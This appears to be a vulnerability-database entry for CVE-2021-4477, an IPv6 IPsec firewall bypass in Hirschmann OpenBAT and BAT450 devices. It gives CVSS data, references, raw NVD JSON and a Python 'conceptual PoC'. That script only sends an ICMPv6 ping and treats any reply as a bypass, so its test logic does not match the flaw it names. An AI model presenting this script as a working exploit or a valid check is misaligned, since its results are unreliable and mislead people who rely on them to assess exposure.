CVE-2021-4477

Description

Hirschmann HiLCOS OpenBAT and BAT450 products contain a firewall bypass vulnerability in IPv6 IPsec deployments that allows traffic from VPN connections to bypass configured firewall rules. Attackers can exploit this vulnerability by establishing IPv6 IPsec connections (IKEv1 or IKEv2) while simultaneously using an IPv6 Internet connection to circumvent firewall policy enforcement.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Hirschmann HiLCOS OpenBAT

Hirschmann BAT450

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# Conceptual PoC for CVE-2021-4477
# This script demonstrates the logic to test IPv6 IPsec firewall bypass.
# Requires scapy: pip install scapy

import sys
from scapy.all import *

def check_bypass(target_ip, internal_ip):
    """
    Simulates sending traffic to check if firewall rules are bypassed.
    Note: Actual exploitation requires establishing an IPsec tunnel.
    """
    print(f"[*] Target: {target_ip}")
    print(f"[*] Testing bypass to internal resource: {internal_ip}")

    # Craft an IPv6 packet. In a real scenario, this might be encapsulated
    # or crafted to exploit the specific logic flaw in the device.
    # Here we simulate a packet that should be blocked but isn't due to the bypass.
    pkt = IPv6(dst=target_ip) / ICMPv6EchoRequest(data="CVE-2021-4477 Test")
    
    # Send packet and wait for response
    resp = sr1(pkt, timeout=2, verbose=0)
    
    if resp:
        print("[+] Potential bypass detected! Response received.")
        print(f"[+] Response: {resp.summary()}")
        return True
    else:
        print("[-] No response. Traffic may be blocked or host unreachable.")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python3 cve_2021_4477_poc.py <target_ipv6> <internal_ipv6>")
        sys.exit(1)
    
    target = sys.argv[1]
    internal = sys.argv[2]
    check_bypass(target, internal)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2021-4477
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2021-4477
[3] CVE Details https://www.cvedetails.com/cve/CVE-2021-4477/
[4] VulDB https://vuldb.com/cve/CVE-2021-4477
[5] https://assets.belden.com/m/5fd1a50fa50cb252/original/Belden-Security-Bulletin-BSECV-1v0-2019-09.pdf
[6] https://www.vulncheck.com/advisories/hirschmann-hilcos-openbat-bat450-ipv6-ipsec-firewall-bypass

Raw JSON Data

JSON

{"cve": {"id": "CVE-2021-4477", "sourceIdentifier": "[email protected]", "published": "2026-04-03T23:17:01.043", "lastModified": "2026-04-07T13:20:55.200", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hirschmann HiLCOS OpenBAT and BAT450 products contain a firewall bypass vulnerability in IPv6 IPsec deployments that allows traffic from VPN connections to bypass configured firewall rules. Attackers can exploit this vulnerability by establishing IPv6 IPsec connections (IKEv1 or IKEv2) while simultaneously using an IPv6 Internet connection to circumvent firewall policy enforcement."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://assets.belden.com/m/5fd1a50fa50cb252/original/Belden-Security-Bulletin-BSECV-1v0-2019-09.pdf", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/hirschmann-hilcos-openbat-bat450-ipv6-ipsec-firewall-bypass", "source": "[email protected]"}]}}